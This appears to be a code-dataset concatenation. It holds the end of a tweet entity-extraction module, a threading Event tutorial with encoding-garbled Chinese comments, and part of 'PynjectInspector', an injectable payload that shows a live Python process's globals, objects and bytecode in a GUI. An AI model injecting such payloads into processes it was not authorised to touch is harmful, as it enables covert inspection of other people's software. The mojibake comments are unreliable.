indices= (list(p.finditer(candidateString)))
indices1= (list(p1.finditer(candidateString)))
indices2= (list(p2.finditer(candidateString)))
if((len(indices)>0) & (len(indices1)==0)& (len(indices2)==0)):
flagTwo=True
if((not flagOne)&(not flagTwo)):
p= re.compile(r'[^\S]*([โ].*?[โ])[^a-zA-Z0-9\s]*[\s]*')
p1=re.compile(r'[^\s]+([โ].*?[โ])[^\s]*')
p2=re.compile(r'[^\s]*([โ].*?[โ])[^\s]+')
indices= (list(p.finditer(candidateString)))
indices1= (list(p1.finditer(candidateString)))
indices2= (list(p2.finditer(candidateString)))
if((len(indices)>0) & (len(indices1)==0)& (len(indices2)==0)):
flagThree=True
if((not flagOne)&(not flagTwo)&(not flagThree)):
p= re.compile(r'[^\S]*([\"].*?[\"])[^a-zA-Z0-9\s]*[\s]*')
p1=re.compile(r'[^\s]+([\"].*?[\"])[^\s]*')
p2=re.compile(r'[^\s]*([\"].*?[\"])[^\s]+')
indices= (list(p.finditer(candidateString)))
indices1= (list(p1.finditer(candidateString)))
indices2= (list(p2.finditer(candidateString)))
if((len(indices)>0) & (len(indices1)==0)& (len(indices2)==0)):
flagFour=True
if (flagOne|flagTwo|flagThree|flagFour):
flag=True
for index in indices:
span= list(index.span())
#print(span[0])
quoteMatch.append([int(span[0]),int(span[1])])
matches+=[int(span[0]),int(span[1])]
#print(matches)
final+=[(candidateString[0:matches[0]],False)]
for i in range(len(matches)-1):
if([matches[i],matches[i+1]] in quoteMatch):
final+=[((candidateString[matches[i]:matches[i+1]]).strip(),True)]
else:
final+=[((candidateString[matches[i]:matches[i+1]]).strip(),False)]
final+=[(candidateString[matches[-1]:],False)]
final=list(filter(lambda strin: strin[0]!="",final))
final=list(map(lambda strin: (strin[0].strip(),strin[1]),final))
#print(final)
for unit in final:
lst=[]
unitsplit=list(filter(lambda unitString: unitString!='',unit[0].split()))
for splitunit in unitsplit:
lst+=[tweetWordList.index(splitunit,unitQuoted[0])]
retList+=[(lst,unit[1])]
else:
retList+=[(unitQuoted,False)]
#print(retList)
return retList
# In[318]:
def trueEntity_process(self,tweetWordList_cappos,tweetWordList):
combined=[]+cachedStopWords+cachedTitles+prep_list+chat_word_list+article_list+day_list
#returns list with position of consecutively capitalized words
#print(tweetWordList_cappos, tweetWordList)
output_unfiltered = self.consecutive_cap(tweetWordList_cappos,tweetWordList)
#print("==>",output_unfiltered)
#splitting at quoted units
output_quoteProcessed=[]
start_quote=[]
end_quote=[]
for unitQuoted in output_unfiltered:
unitout=self.quoteProcess(unitQuoted, tweetWordList)
#print("==>",unitout)
for elem in unitout:
mod_out=[]
out=elem[0]
flag=elem[1]
sflag=False
# 'โโ"
#print(out,flag)
if not (flag):
#for id in range(len(out)):
temp=[]
#print("::",out)
for index in out:
#print(index,tweetWordList[index])
word=(((tweetWordList[index].strip().strip('"โโโโ"')).lstrip(string.punctuation)).rstrip(string.punctuation)).lower()
#print("=>"+word)"โโโโ"
if (word):
if (word in combined):
if(len(out)==1):
temp.append(index)
else:
if (word not in prep_list)&(word not in article_list):
temp.append(index)
else:
sflag=True
#else:
#if ((index==0)||()):
#temp.append(index)
# else:
# print("here")
# else:
# print("here")
#print(temp)
for elem in temp:
out.remove(elem)
#out[id]=temp
lst=[]
for k, g in groupby(enumerate(out), lambda elem: elem[1]-elem[0]):
lst=list(map(itemgetter(1), g))
#print("==>",lst)
if(lst):
mod_out.append((lst,sflag,flag))
#print('==>',mod_out)
else:
mod_out=[(out,sflag,flag)]
#print(mod_out)
#print(mod_out)
if(mod_out):
output_quoteProcessed.extend(mod_out)
#'cgl\print("=====>",output_quoteProcessed)
output= list(filter(lambda element: ((element[0]!=[0])&(element[0]!=[])), output_quoteProcessed))
#print(output)
#consecutive capitalized phrases
consecutive_cap_phrases1=list(map(lambda x: self.f(x[0],x[1],x[2],tweetWordList), output))
consecutive_cap_phrases=list(filter(lambda candidate:(candidate.phraseText!="JUST_DIGIT_ERROR"),consecutive_cap_phrases1))
#self.printList(consecutive_cap_phrases)
#implement the punctuation clause
ne_List_pc=self.flatten(list(map(lambda NE_phrase: self.punct_clause(NE_phrase), consecutive_cap_phrases)),[])
#self.printList(ne_List_pc)
#stopword removal and start-of-sentence
ne_List_pc_sr= list(map(lambda candidate: self.stopwordReplace(candidate), ne_List_pc))
ne_List_pc_checked= list(filter(lambda candidate: (candidate.position!=[0]), ne_List_pc_sr))
#implement title detection
#ne_List_titleCheck= list(map(lambda element: self.title_check(element), ne_List_pc_checked))
#implement slang check and remove
ne_List_slangCheck= list(filter(lambda element: not self.slang_remove(element), ne_List_pc_checked))
#implement apostrophe, tense and punctuation marker with final number check
#ne_List_apostropeCheck= list(map(lambda element: self.apostrope_check(element), ne_List_slangCheck))
#ne_List_punctuationCheck= list(map(lambda element: self.punctuation_check(element), ne_List_apostropeCheck))
ne_List_numCheck=list(filter(lambda candidate: not (candidate.phraseText.lstrip(string.punctuation).rstrip(string.punctuation).strip()).isdigit(), ne_List_slangCheck))
#ne_List_tenseCheck= list(map(lambda element: self.tense_check(element), ne_List_numCheck))
#tracking sudden change in capitalization pattern
#ne_List_capPatCheck= list(map(lambda element: self.capitalization_change(element), ne_List_tenseCheck))
#check on length
ne_List_lengthCheck= list(filter(lambda element: element.length<7, ne_List_numCheck))
ne_List_badWordCheck= list(filter(lambda element:((element.phraseText.strip().strip(string.punctuation).lstrip('โโโโ')).rstrip('โโโโ').lower()) not in combined, ne_List_lengthCheck))
ne_List_allCheck= list(filter(lambda element:(len((element.phraseText.strip().strip(string.punctuation).lstrip('โโโโ')).rstrip('โโโโ'))>1),ne_List_badWordCheck))
#ne_List_allCheck= list(filter(lambda element: (element.phraseText.lower() not in combined), ne_List_double_Check))
#q.put(ne_List_allCheck)
return ne_List_allCheck
#return ne_List_allCheck
# In[319]:
'''This is the main module. I am not explicitly writing it as a function as I am not sure what argument you are
passing.However you can call this whole cell as a function and it will call the rest of the functions in my module
to extract candidates and features
'''
'''#reads input from the database file and converts to a dataframe. You can change this part accordingly and
#directly convert argument tuple to the dataframe'''
#Inputs: Collection.csv 500Sample.csv 3.2KSample.csv eric_trump.csv
#df_out.to_csv('TweetBase500.csv')
#--------------------------------------PHASE I---------------------------------------------------
# In[ ]:
#--------------------------------------PHASE II---------------------------------------------------
'''set1 = set(['Melania','Trump'])
set2 = set(['Donald','Trump'])
set3 = set(['Jared','Kushner'])
m1 = MinHash(num_perm=200)
m2 = MinHash(num_perm=200)
m3 = MinHash(num_perm=200)
for d in set1:
m1.update(d.encode('utf8'))
for d in set2:
m2.update(d.encode('utf8'))
for d in set3:
m3.update(d.encode('utf8'))
# Create LSH index
lsh = MinHashLSH(threshold=0.0, num_perm=200)
lsh.insert("m2", m2)
lsh.insert("m3", m3)
result = lsh.query(m1)
print("Approximate neighbours with Jaccard similarity", result)
candidates=["donald trump","melania trump", "obama","barack obama","barack"]
listofMinhash=[]
m=MinHash(num_perm=200)
candidate0=set(candidates[0].split())
for d in candidate0:
m.update(d.encode('utf8'))
listofMinhash.append(m)
lsh = MinHashLSH(threshold=0.0, num_perm=200)
lsh.insert("m2", m2)
for candidate in candidates[1:]:'''
# In[ ]:
'''
print ("Shingling articles...")
# The current shingle ID value to assign to the next new shingle we
# encounter. When a shingle gets added to the dictionary, we'll increment this
# value.
curShingleID = 0
# Create a dictionary of the articles, mapping the article identifier (e.g.,
# "t8470") to the list of shingle IDs that appear in the document.
candidatesAsShingleSets = {};
candidateNames = []
t0 = time.time()
totalShingles = 0
for k in range(0, len(sorted_NE_container.keys())):
# Read all of the words (they are all on one line) and split them by white space.
words = list(sorted_NE_container.keys())[k].split(" ")
# Retrieve the article ID, which is the first word on the line.
candidateID = k
# Maintain a list of all document IDs.
candidateNames.append(candidateID)
# 'shinglesInDoc' will hold all of the unique shingle IDs present in the current document.
#If a shingle ID occurs multiple times in the document,
# it will only appear once in the set (this is a property of Python sets).
shinglesInCandidate = set()
# For each word in the document...
for index in range(0, len(words)):
# Construct the shingle text by combining three words together.
shingle = words[index]
# Hash the shingle to a 32-bit integer.
#crc = binascii.crc32("")
crc = binascii.crc32(bytes(shingle, encoding="UTF-8")) & (0xffffffff)
# Add the hash value to the list of shingles for the current document.
# Note that set objects will only add the value to the set if the set
# doesn't already contain it.
shinglesInCandidate.add(crc)
# Store the completed list of shingles for this document in the dictionary.
#print(str(words)+": ")
#for i in shinglesInCandidate:
# print('0x%08x' %i)
candidatesAsShingleSets[candidateID] = shinglesInCandidate
# Count the number of shingles across all documents.
totalShingles = totalShingles + (len(words))
# Report how long shingling took.
print ('\nShingling ' + str(str(len(sorted_NE_container.keys()))) + ' candidates took %.2f sec.' % (time.time() - t0))
print ('\nAverage shingles per doc: %.2f' % (totalShingles / len(sorted_NE_container.keys())))
'''
# In[ ]:
'''
# =============================================================================
# Generate MinHash Signatures
# =============================================================================
numHashes=20
numCandidates=len(sorted_NE_container.keys())
# Time this step.
t0 = time.time()
print ('Generating random hash functions...')
# Record the maximum shingle ID that we assigned.
maxShingleID = 2**32-1
nextPrime = 4294967311
# Our random hash function will take the form of:
# h(x) = (a*x + b) % c
# Where 'x' is the input value, 'a' and 'b' are random coefficients, and 'c' is
# a prime number just greater than maxShingleID.
# Generate a list of 'k' random coefficients for the random hash functions,
# while ensuring that the same value does not appear multiple times in the
# list.
def pickRandomCoeffs(k):
# Create a list of 'k' random values.
randList = []
while k > 0:
# Get a random shingle ID.
randIndex = random.randint(0, maxShingleID)
# Ensure that each random number is unique.
while randIndex in randList:
randIndex = random.randint(0, maxShingleID)
# Add the random number to the list.
randList.append(randIndex)
k = k - 1
return randList
# For each of the 'numHashes' hash functions, generate a different coefficient 'a' and 'b'.
coeffA = pickRandomCoeffs(numHashes)
coeffB = pickRandomCoeffs(numHashes)
print ('\nGenerating MinHash signatures for all candidates...')
# List of documents represented as signature vectors
signatures =np.ndarray(shape=(20, numCandidates))
# Rather than generating a random permutation of all possible shingles,
# we'll just hash the IDs of the shingles that are *actually in the document*,
# then take the lowest resulting hash code value. This corresponds to the index
# of the first shingle that you would have encountered in the random order.
# For each document...
for candidateID in candidateNames:
# Get the shingle set for this document.
shingleIDSet = candidatesAsShingleSets[candidateID]
# The resulting minhash signature for this document.
signature = []
# For each of the random hash functions...
for i in range(0, numHashes):
# For each of the shingles actually in the document, calculate its hash code
# using hash function 'i'.
# Track the lowest hash ID seen. Initialize 'minHashCode' to be greater than
# the maximum possible value output by the hash.
minHashCode = nextPrime + 1
# For each shingle in the document...
for shingleID in shingleIDSet:
# Evaluate the hash function.
hashCode = (coeffA[i] * shingleID + coeffB[i]) % nextPrime
# Track the lowest hash code seen.
if hashCode < minHashCode:
minHashCode = hashCode
# Add the smallest hash code value as component number 'i' of the signature.
signature.append(minHashCode)
# Store the MinHash signature for this document.
#signatures.append(signature)
signatures[:,candidateID]=signature
# Calculate the elapsed time (in seconds)
elapsed = (time.time() - t0)
print(list(np.shape(signatures)))
print ("\nGenerating MinHash signatures took %.2fsec" % elapsed)
#print ('\nsignatures stored in a numpy array...')
# Creates a N x N matrix initialized to 0.
# Time this step.
t0 = time.time()
# For each of the test documents...
for i in range(10, 11):
#for i in range(0, numCandidates):
print(list(sorted_NE_container.keys())[i]+": ",end="")
# Get the MinHash signature for document i.
signature1 = signatures[i]
# For each of the other test documents...
for j in range(0, numCandidates):
if(j!=i):
# Get the MinHash signature for document j.
signature2 = signatures[j]
count = 0
# Count the number of positions in the minhash signature which are equal.
for k in range(0, numHashes):
count = count + (signature1[k] == signature2[k])
# Record the percentage of positions which matched.
estJSim= (count / numHashes)
#print(estJSim)
if (estJSim>=0.5):
print("=>"+list(sorted_NE_container.keys())[j]+", ",end="")
print()
# Calculate the elapsed time (in seconds)
elapsed = (time.time() - t0)
print ("\nComparing MinHash signatures took %.2fsec" % elapsed)'''
# In[ ]:
'''cap_phrases="Trump:Russia,Afgha"
words=re.split('[,:]', cap_phrases)
print(words)
candidateString='"BS'
p= re.compile(r'(".*?")[^\s]*[\s]*')
indices= (list( p.finditer(candidateString) ))
matches=[]
final=[]
if(indices):
for index in indices:
span= list(index.span())
#print(span[0])
matches+=[int(span[0]),int(span[1])]
print(matches)
final+=[candidateString[0:matches[0]]]
for i in range(len(matches)-1):
final+=[(candidateString[matches[i]:matches[i+1]]).strip()]
final+=[candidateString[matches[-1]:]]
final=list(filter(lambda strin: strin!="",final))
final=list(map(lambda strin: strin.strip(),final))
print(final)'''
# tweets=pd.read_csv("deduplicated_test.csv", header=0, index_col = 0 ,encoding = 'utf-8',delimiter=';')
# tweets=tweets[:1000:]
# Phase1= SatadishaModule()
# for i in range(2):
# Phase1= SatadishaModule()
# Phase1.extract(tweets,1)
|
ex05_event.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
import threading
from random import randint
"""
5. Event
- ไธไธช็บฟ็จๅ้/ไผ ้ไบไปถ๏ผ
- ๅฆๅค็็บฟ็จ็ญๅพ
ไบไปถ็่งฆๅใ
- ๅๆ ท็จใ็ไบง่
/ๆถ่ดน่
ใๆจกๅไธพไพ:
- ๅฏไปฅ็ๅฐไบไปถ, ่ขซ2ไธชๆถ่ดน่
, ๆฏ่พๅนณๅ็ๆฅๆถๅนถๅค็ไบใ
- ๅฆๆไฝฟ็จไบwaitๆนๆณ๏ผ็บฟ็จๅฐฑไผ็ญๅพ
ๆไปฌ่ฎพ็ฝฎไบไปถ๏ผ่ฟๆๅฉไบไฟ่ฏไปปๅกๅฎๆใ
- ๅค็่ฟ็จ:
- ็ไบง่
ไบง็ๆฐๆฎ:
- ไบง็ๆฐๆฎ, ๅนถๅ็ปๆถ่ดน่
(append ๅฐ็ผๅฒๅบ)
- ๆถ่ดน่
ๅค็ๆฐๆฎ:
- ๆถ่ดน่
็ๅฌไบไปถ, ไธๆญ่ฝฎ่ฏข.
- ๆฅๅๅฐๆฐๆฎ, ๅฐฑๅค็.(pop ๅๅบไธขๆ)
"""
TIMEOUT = 3
# ๆถ่ดน่
:
def consumer(event, data):
thr = threading.currentThread()
fail_num = 0
# ๆญปๅพช็ฏ
# - ่ฟ็ปญ5ๆฌกๆฅๆถไธๅฐๆฐๆฎ, ๅฐฑ็ปๆ่ฟ่ก
#
while True:
set_event = event.wait(TIMEOUT)
if set_event:
try:
digit = data.pop()
print("\t[{}]: receive {} , and handle.".format(thr.name, digit))
time.sleep(2) # ๆจกๆๅค็็ๆ
ข, ๆไบๅนณๅๅ้
.
event.clear()
except IndexError:
pass
else:
fail_num += 1
print("\t[{}]: receive nothing... [{}]".format(thr.name, fail_num))
if fail_num >= 5:
print("[{}]: thread is done.".format(thr.name))
break
# ็ไบง่
:
def producer(event, data):
thr = threading.currentThread()
for i in range(1, 20):
digit = randint(10, 100)
data.append(digit)
print("[{} - {}] --> appended {} to list.".format(i, thr.name, digit))
event.set()
time.sleep(1)
print("\n[{}]: thread is done.".format(thr.name))
def run():
event = threading.Event()
data = []
threads = []
# ๆถ่ดน่
:
for name in ("consumer1", "consumer2"):
thr = threading.Thread(name=name, target=consumer, args=(event, data))
thr.start()
threads.append(thr)
# ็ไบง่
:
# - ็ไบง่
ๅๆถ่ดน่
, ่ฆๅๅผ
# - ๅๅนถๅจไธไธช for ้, ไผๆฅ้
#
p = threading.Thread(name='producer1', target=producer, args=(event, data))
p.start()
threads.append(p)
for thr in threads:
thr.join()
print("run over.")
if __name__ == '__main__':
run() # ็ไบง่
ไบง็็ไบไปถ, ่ขซ2ไธชๆถ่ดน่
, ๆฏ่พๅนณๅ็ๆฅๅๅๅค็.
|
PynjectInspector.py
|
# PYNJECT STANDARD PAYLOAD COLLECTION - https://github.com/am-nobody/pynject/payloads
#
# Title: Pynject Inspector v1.0
# Author: am-nobody
# ================================
# Imports
# ================================
preserved = dict(globals())
import gc
import os
import sys
import dis
import threading
import subprocess
import importlib.util
# Force import the module if the application does not find it in its own path scope.
try:
import tkinter
from tkinter import ttk
from tkinter import font
except ImportError:
def force_load(name):
if (name in sys.modules):
del(sys.modules[name])
if (name in globals()):
del(globals()[name])
verstring = ("-" + str(sys.version_info[0]) + "." + str(sys.version_info[1]))
open((os.getcwd() + "\\temp.py"), "w+").write("import " + name + "\nprint(" + name + ".__file__)")
path = subprocess.check_output(["py", verstring, (os.getcwd() + "\\temp.py")])
os.remove((os.getcwd() + "\\temp.py"))
path = path.decode("utf-8").strip()
if (os.path.exists(path)):
spec = importlib.util.spec_from_file_location(name, path)
module = importlib.util.module_from_spec(spec)
sys.modules[name] = module
spec.loader.exec_module(module)
else:
raise ImportError("Failed to find module, install the proper version of python and this module on your system.")
force_load("tkinter")
del(force_load)
import tkinter
from tkinter import ttk
from tkinter import font
# ================================
# GUI
# ================================
class Inspector():
def __init__(self):
# Clean globals.
global preserved
self.preserved = preserved
del(preserved)
del(globals()["Inspector"])
# Setup vars.
self.moduleList = {}
# Initialize GUI.
self.width = 1000
self.height = 600
self.makeWidgets()
self.positionWidgets()
self.initialization()
self.launch()
# ================================
# Init Functions
# ================================
def makeWidgets(self):
# Frames
self.window = tkinter.Tk()
self.globalFrame = tkinter.Frame(self.window)
self.inspectorFrame = tkinter.Frame(self.window)
self.objectInstanceFrame = tkinter.Frame(self.window)
# Global frame items.
self.gTopFrame = tkinter.Frame(self.globalFrame)
self.gRefreshButton = tkinter.Button(self.gTopFrame, text="Refresh", command=lambda: self.populateGlobalTree(self.globalTree))
self.glabel = tkinter.Label(self.globalFrame, text="Global Symbol List")
self.gscroll_x = tkinter.Scrollbar(self.globalFrame, orient="horizontal")
self.gscroll_y = tkinter.Scrollbar(self.globalFrame)
self.globalTree = ttk.Treeview(self.globalFrame, yscrollcommand=self.gscroll_y.set, xscrollcommand=self.gscroll_x.set)
self.gRightClickMenu = tkinter.Menu(self.globalTree, tearoff=0)
# Inspector frame items.
self.inspectorTreeFrame = tkinter.Frame(self.inspectorFrame)
self.inspectorRefresh = tkinter.Button(self.inspectorTreeFrame, text="Refresh", command=lambda: self.populateInspectorTree(self.inspecting))
self.inspectorTreeLabel = tkinter.Label(self.inspectorTreeFrame, text="Instance Tree")
self.iScroll_x = tkinter.Scrollbar(self.inspectorTreeFrame, orient="horizontal")
self.iScroll_y = tkinter.Scrollbar(self.inspectorTreeFrame)
self.inspectorTree = ttk.Treeview(self.inspectorTreeFrame, yscrollcommand=self.iScroll_y.set, xscrollcommand=self.iScroll_x.set)
self.inspectorDisFrame = tkinter.Frame(self.inspectorFrame)
self.disLabel = tkinter.Label(self.inspectorDisFrame, text="Instance Disassembly")
self.disScroll_x = tkinter.Scrollbar(self.inspectorDisFrame, orient="horizontal")
self.disScroll_y = tkinter.Scrollbar(self.inspectorDisFrame)
self.disassemblyText = tkinter.Text(self.inspectorDisFrame, xscrollcommand=self.disScroll_x.set, yscrollcommand=self.disScroll_y.set)
self.iRightClickMenu = tkinter.Menu(self.inspectorTree, tearoff=0)
# Object type list items.
self.typeFrame = tkinter.Frame(self.objectInstanceFrame)
self.typeLabel = tkinter.Label(self.typeFrame, text="Object Types")
self.typeRefresh = tkinter.Button(self.typeFrame, text="Refresh", command=self.populateTypeList)
self.tscroll_y = tkinter.Scrollbar(self.typeFrame)
self.tscroll_x = tkinter.Scrollbar(self.typeFrame, orient="horizontal")
self.typeList = tkinter.Listbox(self.typeFrame, yscrollcommand=self.tscroll_y.set, xscrollcommand=self.tscroll_x.set, width=30)
self.tRightClickMenu = tkinter.Menu(self.typeList, tearoff=0)
# Instance list items.
self.objectTreeFrame = tkinter.Frame(self.objectInstanceFrame)
self.objectLabel = tkinter.Label(self.objectTreeFrame, text="Object Instances")
self.objectRefresh = tkinter.Button(self.objectTreeFrame, text="Refresh", command=lambda: self.populateObjectTree(self.objectTreeType))
self.oscroll_x = tkinter.Scrollbar(self.objectTreeFrame, orient="horizontal")
self.oscroll_y = tkinter.Scrollbar(self.objectTreeFrame)
self.objectTree = ttk.Treeview(self.objectTreeFrame, yscrollcommand=self.oscroll_y.set, xscrollcommand=self.oscroll_x.set)
self.oRightClickMenu = tkinter.Menu(self.objectTree, tearoff=0)
def positionWidgets(self):
# Frames.
self.window.rowconfigure(0, weight=1)
self.window.columnconfigure(0, weight=1)
self.globalFrame.grid(row=0, column=0, sticky="nesw")
self.objectInstanceFrame.grid(row=1, column=0, sticky="nesw")
self.inspectorFrame.grid(row=0, column=1, rowspan=3, sticky="ns")
# Global frame items.
self.globalFrame.columnconfigure(0, weight=1)
self.globalFrame.rowconfigure(1, weight=1)
self.glabel.grid(row=0, column=0, sticky="w")
self.gTopFrame.grid(row=0, column=1)
self.gRefreshButton.grid(row=0, column=1, sticky="ne")
self.globalTree.grid(row=1, column=0, columnspan=2, sticky="nesw")
self.gscroll_y.grid(row=1, column=2, sticky="ns")
self.gscroll_x.grid(row=2, column=0, columnspan=2, sticky="we")
# Inspector frame items.
self.inspectorFrame.columnconfigure(0, weight=1)
self.inspectorFrame.rowconfigure(0, weight=1)
self.inspectorTreeFrame.grid(row=0, column=0, sticky="nesw")
self.inspectorTreeFrame.columnconfigure(0, weight=1)
self.inspectorTreeFrame.rowconfigure(1, weight=1)
self.inspectorTreeLabel.grid(row=0, column=0, sticky="w")
self.inspectorRefresh.grid(row=0, column=0, sticky="e")
self.inspectorTree.grid(row=1, column=0, sticky="nesw")
self.iScroll_x.grid(row=2, column=0, sticky="we")
self.iScroll_y.grid(row=1, column=1, sticky="wns")
self.inspectorDisFrame.grid(row=1, column=0, sticky="nesw")
self.inspectorDisFrame.columnconfigure(0, weight=1)
self.inspectorDisFrame.rowconfigure(1, weight=1)
self.disLabel.grid(row=0, column=0, sticky="nw", pady=(0, 5))
self.disassemblyText.grid(row=1, column=0, sticky="nesw")
self.disScroll_x.grid(row=2, column=0, sticky="we")
self.disScroll_y.grid(row=1, column=1, sticky="wns")
# Object type list items.
self.typeFrame.columnconfigure(0, weight=1)
self.typeFrame.rowconfigure(1, weight=1)
self.typeFrame.grid(row=0, column=0, sticky="wns", padx=(0, 10))
self.typeLabel.grid(row=0, column=0, sticky="w")
self.typeRefresh.grid(row=0, column=1, sticky="e")
self.typeList.grid(row=1, column=0, columnspan=2, sticky="nesw")
self.tscroll_y.grid(row=1, column=2, sticky="ns")
self.tscroll_x.grid(row=2, column=0, columnspan=2, sticky="we")
# Instance list items.
self.objectInstanceFrame.rowconfigure(0, weight=1)
self.objectInstanceFrame.columnconfigure(1, weight=1)
self.objectTreeFrame.columnconfigure(0, weight=1)
self.objectTreeFrame.rowconfigure(1, weight=1)
self.objectTreeFrame.grid(row=0, column=1, sticky="nesw")
self.objectLabel.grid(row=0, column=0, sticky="w")
self.objectRefresh.grid(row=0, column=1, sticky="e")
self.objectTree.grid(row=1, column=0, columnspan=2, sticky="nesw")
self.oscroll_y.grid(row=1, column=2, sticky="ns")
self.oscroll_x.grid(row=2, column=0, columnspan=2, sticky="we")
def initialization(self):
# Frames.
self.window.title("Pynject Inspector v1.0")
self.window.bind('<Configure>', self.resize)
self.window.geometry(str(self.width) + "x" + str(self.height))
self.window.attributes('-topmost', 1)
self.globalFrame.config(height=(self.height * (5/8)), width=(self.width * (2/3)))
self.objectInstanceFrame.config(height=(self.height * (3/8)), width=(self.width * (2/3)))
self.inspectorFrame.config(width=(self.width * (1/3)))
# Global frame items.
self.style = ttk.Style(self.window)
self.style.configure('Treeview', rowheight=30)
self.globalTree['columns'] = ("ID", "Symbol", "Value")
self.globalTree.column("#0", anchor="w", width=60, stretch=True)
self.globalTree.column("ID", anchor="w", width=60, stretch=True)
self.globalTree.column("Symbol", anchor="w", width=120, stretch=True)
self.globalTree.column("Value", anchor="w", stretch=True)
self.globalTree.heading("#0", text="Type", anchor="w")
self.globalTree.heading("ID", text="ID", anchor="w")
self.globalTree.heading("Symbol", text="Symbol", anchor="w")
self.globalTree.heading("Value", text="Value", anchor="w")
self.gscroll_x.config(command=self.globalTree.xview)
self.gscroll_y.config(command=self.globalTree.yview)
self.globalTree = self.populateGlobalTree(self.globalTree)
self.globalTree.bind('<Button-3>', lambda popup: self.treeMenu(popup, self.globalTree))
self.gRightClickMenu.add_command(label="Inspect", command=lambda: self.inspect(self.globalTree))
self.gRightClickMenu.add_command(label="Find Instances", command=self.globalInstanceType)
# Inspector frame items.
self.inspectorFrame.grid_propagate(False)
self.inspectorDisFrame.grid_propagate(False)
self.inspectorTreeFrame.grid_propagate(False)
self.disScroll_y.config(command=self.disassemblyText.yview)
self.disScroll_x.config(command=self.disassemblyText.xview)
self.iScroll_y.config(command=self.inspectorTree.yview)
self.iScroll_x.config(command=self.inspectorTree.xview)
self.disassemblyText.config(wrap="none")
self.inspectorTree['columns'] = ("ID", "Symbol", "Value")
self.inspectorTree.column("#0", anchor="w", width=60, stretch=True)
self.inspectorTree.column("ID", anchor="w", width=60, stretch=True)
self.inspectorTree.column("Symbol", anchor="w", width=120, stretch=True)
self.inspectorTree.column("Value", anchor="w", stretch=True)
self.inspectorTree.heading("#0", text="Type", anchor="w")
self.inspectorTree.heading("ID", text="ID", anchor="w")
self.inspectorTree.heading("Symbol", text="Symbol", anchor="w")
self.inspectorTree.heading("Value", text="Value", anchor="w")
self.inspectorTree.bind('<Button-3>', lambda popup: self.treeMenu(popup, self.inspectorTree))
self.iRightClickMenu.add_command(label="Enumerate", command=self.enumerateChildren)
self.iRightClickMenu.add_command(label="Disassemble", command=self.disassembleObject)
# Object frame items.
self.objectInstanceFrame.grid_propagate(False)
self.objectTreeType = None
self.tscroll_y.config(command=self.typeList.yview)
self.tscroll_x.config(command=self.typeList.xview)
self.oscroll_x.config(command=self.objectTree.xview)
self.oscroll_y.config(command=self.objectTree.yview)
self.typeList.bind('<Button-3>', lambda popup: self.listMenu(popup, self.typeList))
self.tRightClickMenu.add_command(label="Find Instances", command=lambda: self.populateObjectTree(self.typeList.get(self.typeList.curselection()[0])))
self.objectTree['columns'] = ("ID", "Symbol", "Value")
self.objectTree.column("#0", anchor="w", width=60, stretch=True)
self.objectTree.column("ID", anchor="w", width=60, stretch=True)
self.objectTree.column("Symbol", anchor="w", width=120, stretch=True)
self.objectTree.column("Value", anchor="w", stretch=True)
self.objectTree.heading("#0", text="Type", anchor="w")
self.objectTree.heading("ID", text="ID", anchor="w")
self.objectTree.heading("Symbol", text="Symbol", anchor="w")
self.objectTree.heading("Value", text="Value", anchor="w")
self.objectTree.bind('<Button-3>', lambda popup: self.treeMenu(popup, self.objectTree))
self.oRightClickMenu.add_command(label="Inspect", command=lambda: self.inspect(self.objectTree))
def launch(self):
gc.enable()
self.populateTypeList()
self.resizeTreeColumns(self.globalTree)
self.window.attributes('-topmost', 0)
self.window.mainloop()
# ================================
# Utility Functions
# ================================
# Enumerate function arguments. Returns argc int and argv list.
def funcArgs(self, function):
args = []
for i in range(function.__code__.co_argcount):
args.append(function.__code__.co_varnames[i])
return(args)
# Enumerate inspector object's children.
def enumerateChildren(self):
iid = self.inspectorTree.selection()[0]
self.parseChildren(iid)
# Attempt to disassemble object.
def disassembleObject(self):
iid = self.inspectorTree.selection()[0]
item = self.inspectorTree.item(iid)
itemId = item["values"][0]
object = self.inspectorObjs[itemId]
self.disassemblyText.delete('1.0', tkinter.END)
try:
disassembled = dis.Bytecode(object).dis()
self.disassemblyText.insert(tkinter.INSERT, disassembled)
except:
self.disassemblyText.insert(tkinter.INSERT, "Could not disassemble object.")
# Finds the instance type of the selected global tree symbol.
def globalInstanceType(self):
item = self.globalTree.item(self.globalTree.selection()[0])
itemType = item["text"]
if (itemType == "type"):
itemType = item["values"][0]
self.populateObjectTree(itemType)
# Find the object to be inspected and pass it to populate function.
def inspect(self, tree):
item = None
self.inspecting = None
# Find object from item.
def findObject(item):
itemId = item["values"][0]
if (tree == self.globalTree):
for glob in dict(globals()):
if (id(globals()[glob]) == itemId):
self.inspecting = globals()[glob]
else:
for obj in list(gc.get_objects()):
if (id(obj) == itemId):
self.inspecting = obj
iid = tree.selection()[0]
while (tree.parent(iid)):
iid = tree.parent(iid)
item = tree.item(iid)
findObject(item)
if (self.inspecting == None):
return
self.populateInspectorTree(self.inspecting)
# Parse children of selected object in inspector tree.
def parseChildren(self, parentIid):
item = self.inspectorTree.item(parentIid)
object = self.inspectorObjs[item["values"][0]]
objectType = type(object).__name__
if (objectType == "list" or objectType == "set" or objectType == "tuple"):
for child in object:
self.inspectorObjs[id(child)] = child
self.insertTree(self.inspectorTree, "", child, parentIid)
elif (objectType == "dict"):
for child in object:
self.inspectorObjs[id(object[child])] = object[child]
self.insertTree(self.inspectorTree, child, object[child], parentIid)
else:
children = {}
referents = gc.get_referents(object)
if (len(referents) > 0):
if (type(referents[0]).__name__ == 'dict'):
children = referents[0]
# Add children to tree.
for child in children:
self.inspectorObjs[id(children[child])] = children[child]
self.insertTree(self.inspectorTree, child, children[child], parentIid)
self.resizeTreeColumns(self.inspectorTree)
# Resize the window to proper proportions when window <Configure> event is triggered.
def resize(self, arg):
self.window.update_idletasks()
self.width = self.window.winfo_width()
self.height = self.window.winfo_height()
self.globalFrame.config(height=(self.height * (5/8)), width=(self.width * (2/3)))
self.objectInstanceFrame.config(height=(self.height * (2.5/8)), width=(self.width * (2/3)))
self.inspectorFrame.config(width=(self.width * (1/3)))
self.inspectorDisFrame.config(height=(self.objectInstanceFrame.winfo_height()))
# Resize tree columns to fit top level content. (FIX ME)
def resizeTreeColumns(self, tree):
indices = tree.get_children()
largestType = 0
largestID = 0
largestSymbol = 0
largestValue = 0
for index in indices:
typeString = tree.item(index)["text"]
idString = tree.item(index)["values"][0]
symbolString = tree.item(index)["values"][1]
valueString = tree.item(index)["values"][2]
if (largestType < font.Font.measure(font.nametofont("TkDefaultFont"), typeString)):
largestType = font.Font.measure(font.nametofont("TkDefaultFont"), typeString)
